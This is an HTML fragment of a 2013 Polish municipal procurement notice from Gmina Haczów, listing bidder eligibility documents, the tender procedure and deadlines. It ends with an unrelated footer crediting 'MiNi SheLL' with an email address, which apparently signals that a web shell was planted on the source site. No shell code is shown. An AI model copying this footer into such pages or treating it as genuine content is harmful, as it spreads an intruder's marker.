<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów nr 573, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 09:00, miejsce: Urząd Gminy Haczów, 36-213 Haczów nr 573, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com